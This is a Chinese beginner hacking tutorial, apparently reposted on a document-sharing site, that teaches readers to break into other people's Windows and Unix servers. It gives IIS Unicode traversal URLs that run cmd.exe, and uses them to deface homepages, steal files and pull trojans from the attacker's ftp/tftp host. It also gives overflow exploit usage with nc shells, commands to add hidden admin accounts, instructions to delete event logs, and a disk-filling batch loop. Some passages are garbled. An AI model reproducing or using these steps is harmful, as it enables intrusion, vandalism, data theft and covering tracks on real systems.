黑客入门.docx

黑客入门.docx

《黑客入门.docx》由会员分享，可在线阅读，更多相关《黑客入门.docx（17页珍藏版）》请在冰豆网上搜索。

黑客入门

这是一套适合初学者由浅到深的文章，所以强烈推荐给大家，首先是工具，

1，一台属于自己的可以上网的电脑。

如果你是网吧里上网的朋友那你就应该有一台属于自己的控制的肉鸡，这样非常方便的下载各种工具，省得每次使用的时候都要下载各种工具！

2，windows2000/nt,不要用WIN98对网络支持极差，命令受限制，很多软件又不能用，对黑客来说使用起来绊手绊脚，非常不利。

这里我推荐2000，这是一个很成熟的系统（漏洞还是有一堆）。

3，冰河，非常不错的远程控制工具

4，oicq。

为了方便大家的交流技术哦！

5，superscan。

很好用的端口扫描器，速度超快，功能一流！

6，一本笔记本/便条，网上资料相当多，黑客处理的也是非常之多。

良好的习惯决定了你的效率，准备一本笔记本，记录下你的成果，肉鸡，木马利用，命令，密码……坚持一下，你会发现你的效率大幅上升的！

7，lc3.著名nt/2000sam破解程序，有时我们拿不到足够权限，又没好办法，那么lc3是最好的解决办法，只要你拿的到sam，你就是服务器它爷爷！

本站有其破解程序，支持了暴力破解！

8，程序合并。

用来合并程序，把木马与正常文件捆绑到一起，以骗过对方而执行

9，流光4.7for2000/nt。

可能是世界上最好的综合类黑软！

中国的骄傲，它集成了很全的漏洞信息，速度快，方法多，对有漏洞的主机是毁灭性的打击，操作又方便，是快速黑站必不可少的精品工具。

超级吐血推荐！

！

10，黑客是门很高深的学问，不要幻想一步登天，失败是常有的事，千万不可灰心。

在那么多黑软的包围下，切不可完全依赖他们，一定要了解它们利用什么原理工作。

对任何一个小问题，小细节，一定要问清楚，cshu就是给大家互相交流的场所哦！

黑完后不要得意忘形，打扫战场也很重要，以防万一。

下面我们要介绍如何掌握一台主机的基本信息，

我们要黑一台主机，首先要了解它的信息，包括它的类型，用户列表，目录，端口，漏洞等等，而且我们应该知道它的ip,很简单，ping它一下就可以了。

Ping，看看窗口里有了

知道了ip，下一步应该确定端口了。

下面是一些常用的端口的默认值

21--ftp重要哦

23--telnet欢呼吧

25-smtp尽管重要，但似乎没什么可利用的

53--domain同上

79--finger可知道用户信息了

80--http

110--pop收信的

139--netbios共享用的，很有利用价值哦

3389--win2000超级终端呵呵，这个好！

其实端口有上千种，这些最最常用

我们怎么知道服务器有什么端口打开呢？

？

去找个扫描器吧，x-scan,superscan,flux等等很多哦。

这里我推荐superscan，速度很快，本站也有其教程哦！

用法还是比较傻瓜的。

那么我们该如何应对呢？

若有ftp,那就用用匿名登陆。

自己动手也行，最好用x-scanflux等吧！

反正，有ftp就有一份希望

telnet在！

好!

telnet111.111.222.222，出现窗口了吧！

嗯？

要密码？

看来网管还不是超级白痴：

）随便猜个，错了，闪人！

Smtp,看着它，无奈

domain，一般它带了局域网了

finger可以知道用户列表了，不好，忘了用法了，幸好finger很少出现

80肯定在，我们等会来对付它

110有smtp，pop在也不奇怪了

139找个扫描器来找找有没有露在外面的共享吧，日后也用得着

3389太太太好了！

！

打开客户端吧，用输入法漏洞试试，成了就干了它！

不成也没事，我们以后完全控制它3389会很方便的。

端口扫完了！

我们在多了解它一点吧！

追捕大家都知道吧，其实用它获取主机信息也不赖哦。

打开追捕，输入ip,选择智能追捕，是不是有很多信息出来了？

虽然不能直接利用，但毕竟我们有对它有了进一步的了解。

掌握了那么多信息，我们该做点什么了，一般黑客入侵都是靠着系统漏洞，不会都傻傻地去暴力破解的。

我们现在就要看看它有什么漏洞。

对漏洞大家可能不太了解，我这里也不能一一说明了，太多了，感兴趣的话去论坛找freedom吧！

目前广泛利用和存在的漏洞有：

unicode,unicode后续，iis溢出，.idq,.frontpageextend,输入法漏洞等等大漏洞。

至于如何确定，呵呵，绝对不会是一行一行地在ie中试吧，拿出x-scan吧，很好的扫描器哦！

稍微设置一下就上路吧！

过了一会，呵呵，报告出来了，快看，哇！

漏洞一大堆！

这下赚了！

各条漏洞都有详细的信息，大家看吧，总比我说的准了。

现在这台主机已经和我们成为亲戚了，要让这位亲爱的亲戚做点事，就要开始各种攻击了，下回我们就探讨一下最最可爱的unicode漏洞，各位可能就会在unicode中完成第一次黑客体验，再见：

）

今天我们谈谈unicode漏洞，这可是基础中的基础，重点里的重点，不懂的一定要好好学。

微软IIS4.0/5.0扩展UNICODE目录遍历漏洞

下面开始正式学习：

一，UNICODE漏洞的原理

此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，台湾繁体中文也同样存在这样的漏洞。

中文版的WIN2000中，UNICODE编码存在BUG，在UNICODE编码中

%c1%1c-〉（0xc1-0xc0）*0x40+0x1c=0x5c='/'

%c0%2f-〉（0xc0-0xc0）*0x40+0x2f=0x2f='\'

在NT4中/编码为%c1%9c

在英文版里：

WIN2000英文版%c0%af

在中文win2k里：

%c1%1c

本文例子均以win2k为准，其他类型请自行替换。

二，一切从基础开始

由于winnt\system32\cmd.exe的存在，使远程执行命令变为可能，在浏览器里输入以下请求：

（假设11.11.22.22有漏洞）11.11.22.22/scripts/..%c1%winnt/system32/cmd.exe?

/c+dir

学过dos的应该可以看懂，其实就是利用当中的非法请求使我们可以连到system32下，如果inetpub\目录不合winnt同盘，或者目录级数有改动，可能会引起请求失败。

如果成功，那么在浏览区可看到如下信息：

DirectoryofC:

\inetpub\scripts

2000-09-2815:

49〈DIR〉.

2000-09-2815:

49〈DIR〉..（假设目录中没有文件，实际上有一大堆）

是不是有自己机器的感觉了，正点！

就是这种感觉！

Cmd.exe相当与dos里的，因此，我们可以执行很多命令了！

Http:

//11.11.22.22/msadc/..á_../..á_../..á_../winnt/system32/cmd.exe?

/c+dir（这个命令同样道理）

大家请注意：

/c后面的+，实际上，他就是空格，请记牢！

Dir开始就是dos命令了，我们可以更改一下：

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?

/c+copy+c:

\autoexec.bat+c:

\winnt\auto.exe

会dos的朋友一定懂其意义了，不懂的请去看书.

三，实战演练

1，修改主页！

（是不是很爽？

）

一般主页位置在c:

\inetpub\wwwroot下，但要是改了路径，就需要找找了。

最方便的方法：

在浏览器里输http:

//11.11.22.22/.ida要是有漏洞　

分析法：

用dir看各个盘符的根目录，看可疑的就进去看，运气好的在一分钟里找到，这要看运气和直觉。

Dir/s法：

首先在看其主页，找个图片或连接，看它的文件名，比如，11.11.22.22首页上有一幅图片，右击，属性，看到了吗？

Iloveu.gif，然后我们利用unicode输入这条命令dirc:

\iloveu.gif/s意味着查找c盘下所有目录里的iloveu.gif，注意实际应用时别忘了把空格改为+,如果没有继续找d盘，很快就能确定主页目录的。

找到了目录，就要对它开刀了！

一般默认收页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个，现在我们确定11.11.22.22中为index.htm

那么我们就修改它吧！

最方便的方法：

echo法。

Echo是一个系统命令，主要用于设置回应开关，而echocshu>c:

\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容，echocshunice>>c:

\autoexec.bat就是加入cshunice但不删除原有内容，这样我们就可以逍遥的改了。

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?

/c+echo+hackedbycshu+>c:

\inetpub\wwwroot\index.htm

回应为：

HTTP500-内部服务器错误

通过对cmd的分析，袁哥得出一条简便的方法，加入"符号

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?

/c+echo+hackedbycshu+>c:

\inetpub\wwwroot\index.htm

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?

/c+echo+2001730+>>c:

\inetpub\wwwroot\index.htm

回应为：

cgi错误，不用理会两条命令一下，呵呵，再看看11.11.22.22，是不是烙上我们的大名了？

不错吧

而在实际操作中，可能袁哥的方法也会失效，这时，我们就可以copycmd.exe为另一个exe，记住路径，用copy后的来echo

例如：

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?

/c+copy+cmd.exe+c:

\a.exe

11.11.22.22/scripts/..%c1%1c../a.exe?

/c+echo+hackedbycshu+>c:

\inetpub\wwwroot\index.htm

2,上传法：

echo有点不讲道理，把人家的文件破坏了，要是想在主页上增光添彩，那就应该用改好的主页上传，这个我们后面介绍。

3，不准在主页里加入恶性语句

2，下载文件

要是有什么有用的文件被你发现，那我们如何下载呢？

最简单的方法：

把文件copy至网页目录下。

Copyc:

\email\baby.emlc:

\inetpub\wwwroot\baby.zip,然后，下载11.11.22.22/baby.zip就行了，注意！

实际应用中要记得对文件名进行修改，总之不能暴露。

3，最重要的上传

一般方法：

ftp法

首先建一个ftp脚本文件：

c:

\hehe.haha（名字乱取把），申请一个ftp账号，然后用echo吧

echo+open（ftp主机）>c:

\hehe.haha

echo+useryourname>>cc:

\hehe.haha（yourname是用户名）

echo+yourpasswd>>c:

\hehe.haha（yourpasswd是密码）

echo+getsetup.exe>>c:

\hehe.haha要下载的文件

echo+quit>>c:

\hehe.haha

完了以后：

ftp+/s:

c:

\hehe.haha,由于是ftp主机，那么速度一定很快，过一会setup.exe就会出现在当前目录了（也就是cmd所在目录）

别忘了先上传到ftp主机，不要做马大哈哦！

最简单的方法：

tftp法。

这种方法不用中转服务器，首先准备一个tftp服务端，它的作用就是把你的机器做成一个tftp服务器，利用漏洞机器来下载（注意，运行tftp时不要运行其他的ftp软件）

在这里我推荐ciscotftpserver，自己去找找把，实在没有来找我：

）安装好后运行，别忘了设置好默认目录，否则会找不到文件

tftp命令：

tftp-I1.2.3.4GETihateu.exec:

\winnt\ihateu.exe（ihateu.exe在默认目录里）1.2.3.4为你的ip，用unicode运行一下，会看到tftpserver里有反应了，这就好了，不一会，文件就传上去了，方便把！

学会了上传，我们就可以好好改主页，还可以上传木马，还可以把程序放上去运行…………（运行程序和在dos里一样）

4，如何清除痕迹

虽然国内主机纪录ip的不是很多，但万事小心为妙，unicode权限达不到admin。

用cleaniislog行不通，就…………直接删吧！

C:

\winnt\system32\logfiles\*.*C:

\winnt\ssytem32\config\*.evt

C:

\winnt\system32\dtclog\*.*

C:

\winnt\system32\*.log

C:

\winnt\system32\*.txt

C:

\winnt\*.txt

C:

\winnt\*.log

全……擦掉！

四，细节问题。

1，遇到长文件名怎么办？

C:

\programfiles\

就用c:

\"program20%files"\

2，遇到空格怎么办？

20%代替喽，或者xxyy=xxyy~1

3,如何做个很大的文件？

目的就是破坏啦！

我不喜欢不过教教你们啦

@echooff

echobig>c:

\a.a

:

h

copyc:

\a.a+c:

\a.ac:

\a.a

gotoh

注意不要乱来啊！

4，输入命令，没反应或反应不对。

：

）请检查检查再检查命令的正确性，可能没有漏洞，那就闪人！

看在你看到这里那么给我面子的份上，在给你几个吧！

Http:

//cripts/..à;ˉ..àˉ..àˉ..à

ˉ../winnt/system32/cmd.exe?

/c+dir+c:

\

不一定有用哦！

5，如何找到unicode漏洞的主机

呵呵：

）最好的方法自然是………………一个一个ping,一个一个试喽：

）

不要打我呀！

我说我说。

最好找一个cgi扫描器，unicode查找器多如牛毛，随便找个吧！

6，我copy，del文件，怎么显示aceessdenined?

这个不好办了，由于unicode所拥有的权限有限，出现上述情况很正常，我们要做的便是提高自己的权限！

这个我会在今后介绍，现在你可以试试attrib

attrib-r-h-sc:

\autoexec.bat

再对autoexec.bat进行操作，看看有没有效果，成功率不高，不好意思！

7，我黑了主页，天下无敌？

Echo主页或改主页在不懂黑客的人看起来很了不起，不过，它最多算是一个基础，拿到admin才是我们的终极目标！

8，我如何做更多的事？

第一，努力提高权限

二，由于cmd的限制，我们可以做的不多，那就要程序帮忙，上传吧！

切记，要隐秘！

一，frontpage扩展攻击。

为什么把它放第一位呢？

原因很简单，它最最方便，frontpage服务器扩展是一种方便的远程站点管理功能，可是由于某些网管白痴的疏忽（为什么白痴满街飞？

）不设置访问密码，如果那样的话，我们只要用一个frontpage就可以黑它了！

！

这完全不是黑客工具，但它确实办到了，还要感谢白痴网管和微软啊！

具体做法：

1，准备frontpage，我是用dreamweaver的，但它不能黑啊：

）最好是2000版，只是不要是老掉牙的版本就行了。

2，找一台有frontpage扩展的主机，可以用流光，也可以用搜索引擎查找/_vti_pvt/，这是frontpage扩展的标志。

3，接下来打开frontpage,（妈妈：

你在干什么？

回答：

做网页！

妈妈：

好孩子！

^_^）文件菜单下选择“打开站点”，然后在文件夹框里http:

//11.11.22.22（我习惯用这个做?

..僮魍澄募恕?

/a>4，万一跳出错误信息，表示有密码（这个不算白痴）这时我们试着用以下urhttp:

//11.11.22.22/_vti_pvt/service…盎箍梢愿耐场?

/a>我的看法：

这个漏洞只能说明网管的疏忽，对我们而言是没有什么利用价值的，只可以改改网页，也许这也够了，但要进一步控制主机，此漏洞就无能为力。

消遣时可以玩玩。

二，iis.printer溢出攻击

据说缓冲区溢出攻击是黑客入侵时70%所选的方法，看起来有点夸张，但确实有道理，因为暴力密码破解在网络上变得非常之慢，而像unicode的解码漏洞所取得的权限又太低，而缓冲区溢出一般可取得system权限，是非常有用的！

具体原理我也不是很清楚，只能说个大概：

当我们向系统发出超出缓冲区大小的数据处理请求时，便会引发溢出，并弹出错误对话框，我们常看到的“非法操作”其实也是可能是由于溢出。

而当溢出时，eip发生错误，有汇编知识的朋友应该记得，eip是控制执行代码的位置（顺便问一下，有没有会crack的高人，记得做我老师）这时加入一段恶性代码，算好发生溢出时的eip值，这样溢出时就会执行恶性代码而不是当掉。

非法操作我们知道多的不得了，因此……溢出攻击是非常强大的！

由于汇编对于我们来说较难掌握，加之对溢出的了解很有限，那么我们只能借助高手们的程序来黑了。

具体方法：

1，准备iishack，本站有下载，该版本可以对多种系统进行攻击。

2，用x-scan或流光扫描一个有iis.printer漏洞的主机，然后就可以攻击了。

3，在命令行方式执行iis5hack（主机ip）（端口号，默认80）（系统代号，具体可参考程序的说明）（shell口）

例如：

iis5hack11.11.22.22801111（以为在111端口开一个shell）

4,用nc或telnet连上，nc/telnet11.11.22.22111,成功的话就可以控制机器了，加个用户，做个代理……

我的看法：

这算是一个比较有用的漏洞了，它能帮助我们取得system权限，其实和admin差不了多少了，对于做一台跳板是非常有利的，希望大家熟练掌握。

三，idq/ida漏洞溢出攻击

这是时下很热门的了，原理和上面的printer相似，目前我只找到了iis5的攻击程序，在cshu里也可以找到的，我们准备的是snake的gui版本，很方便的。

具体方法：

1，准备snakeiis溢出程序。

可以从本站下载。

2，ida/idq漏洞很多的，但win2k的服务器就不是那么普遍了，所以用你熟练的扫描器去找一打win2k的机器吧。

3，程序的界面是很傻瓜的，把ip填入，选择好类型，按下溢出按钮，显示shellcode发送完毕。

4，telnet/nc到你设定好的端口，如果成功的话，会显示目录下的信息（因为默认shellcode是dir）

5，欢呼吧！

再次溢出，别忘了改shellcode为你想要的代码哦。

6，重复4，很快一台新鲜的win2k被你控制了！

我的看法：

我很喜欢用这种攻击，因为win2k的3389可以很方便的为我做事，省力地搞到一台win2k，然后慢慢享用，爽到根尖细胞啊！

大家应该掌握这项方法。

四，*bsdtelnetd溢出攻击

又是溢出，不过这个可是真正的热点哦，最近红盟等大型安全网站被黑就是因为这个！

所以看看吧

具体方法：

1，使用fbsdhackforwin2k来攻击，本站有下载的

2，还是要找到这样的主机，一般是unix的，比较少的，用专门的扫描器吧，本站有相关的工具。

3，等吧！

这个漏洞要发送的信息很大，大约16mb,可怕吧，所以最好用高速肉鸡

我的看法：

这个漏洞的利用比较有难度，从找机器开始就是。

但作为黑客爱好者，我们没有理由去回避它！

五，密码暴力破解

这是最最原始，也是最最基本的攻击的方式了，利用字典文件或暴力模式，对密码进行探测。

费时费力，但若有经验的话，可以缩短这一过程。

具体方法：

1，找一个破解器，有ftp,http,smtp,pop3,telnet等等类型。

2，找到一台相应的主机。

3，设定一番，上路吧！

你可以睡觉，可以去machine（就是做作业），可以去泡妞……就是不要傻等。

为什么呢？

因为会伤视力的：

）怎么倒了一片，起来起来！

4，万一成功了（之所以用这个词，是因为成功率很低的）表明你运气旺，赶紧下线，买彩票去吧^_^

不知道大家对unicode和溢出攻击是不是熟练了？

没有的要加油哦！

今天我们来谈谈权限的提升。

在windows系统中，最高的权限掌握在administrators的手里，unix中称为root,我们要完全掌握一台机器，拿到admin是不可或缺的。

首先说说最简单的:

systemtoadmin

当我们用溢出攻击成功后，其实我们已经拿到了system权限（具体看每种攻击而可能有所不同）这时我们很容易拿到admin权限。

首先看看一下命令：

netuser察看用户表netuserusernamepass/add（添加密码为pass的用户username）

netlocalgroup察看组netlocalgroupguestscshu/add把cshu用户加入guests组

netuse\\ip\ipc$"password"/user:

username这是远程连接的命令

假如我们溢出了11.11.22.22，那么这样做吧！

Netuser（看到了iusr_machinename的用户了，它一般没什么权限的）netuseriusr_machinenamecshu（把它的密码设为cshu）

netlocalgroupadministratorsiusr_machinename/add（加入administrators组）

这样我们就拥有了iusr_machinename这一账号，admin权限，简单吧！

熟悉一下netuse命令：

netuse\\11.11.22.22\ipc$"cshu"/user:

iusr_machinename建立连接

copyc:

\haha.exe\\11.11.22.22\admin$